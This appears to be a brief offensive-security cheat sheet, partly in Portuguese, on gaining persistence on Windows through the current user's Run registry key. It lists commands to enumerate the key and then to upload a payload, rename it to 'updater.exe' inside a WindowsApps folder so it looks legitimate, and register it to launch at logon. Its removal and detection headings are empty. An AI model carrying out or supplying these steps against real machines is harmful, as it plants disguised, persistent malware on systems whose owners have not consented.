Registry Run Key (HKCU)
Descrição
HKCU\Software\Microsoft\Windows\CurrentVersion\RunEnumeração
reg_query HKCU Software\Microsoft\Windows\CurrentVersion\RunGet-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"Attack / Execution
cd C:\Users\<user>\AppData\Local\Microsoft\WindowsApps
upload C:\Payloads\http_x64.exe
mv http_x64.exe updater.exe
reg_set HKCU Software\Microsoft\Windows\CurrentVersion\Run Updater REG_EXPAND_SZ %LOCALAPPDATA%\Microsoft\WindowsApps\updater.exeRemoção
Detecção
OPSEC
Last updated